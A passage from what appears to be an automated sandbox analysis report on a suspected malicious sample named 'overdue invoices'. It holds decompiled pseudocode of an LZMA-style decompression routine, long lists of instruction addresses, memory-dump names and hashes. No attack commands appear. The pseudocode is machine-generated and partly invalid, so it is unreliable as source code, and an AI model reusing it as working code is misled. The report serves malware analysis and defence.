							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                  0x00405ead
                  0x00405eb4
                  0x00405eba
                  0x00405ec0
                  0x00000000
                  0x00405ec4
                  0x00405ed0
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x00000000
                  0x00405ee6
                  0x00405eea
                  0x00000000
                  0x00000000
                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efb
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f46
                  0x00405f49
                  0x00405f71
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4b
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f63
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fba
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fbf
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fdc
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x00000000
                  0x0040684a
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406022
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066ca
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406700
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406709
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x00000000
                  0x004068bc
                  0x00406719
                  0x00406720
                  0x00406728
                  0x00406728
                  0x00406728
                  0x0040672b
                  0x0040672e
                  0x0040672e
                  0x00000000
                  0x00000000
                  0x0040604c
                  0x0040604e
                  0x00406051
                  0x004060c2
                  0x004060c5
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x00000000
                  0x004060d9
                  0x00406053
                  0x00406057
                  0x0040605a
                  0x0040605c
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406074
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x00406089
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x00406099
                  0x0040609c
                  0x004060ba
                  0x004060bc
                  0x00000000
                  0x004060bc
                  0x0040609e
                  0x004060a1
                  0x004060a4
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x00000000
                  0x004062eb
                  0x004062ef
                  0x0040630d
                  0x00406310
                  0x00406317
                  0x0040631a
                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x00000000
                  0x00000000
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x00000000
                  0x00406424
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x00000000
                  0x00000000
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00406734
                  0x00406734
                  0x00000000
                  0x00406734
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x004068d2
                  0x004068d8
                  0x004068da
                  0x004068e1
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                  • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                  • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                  • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004062EB Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
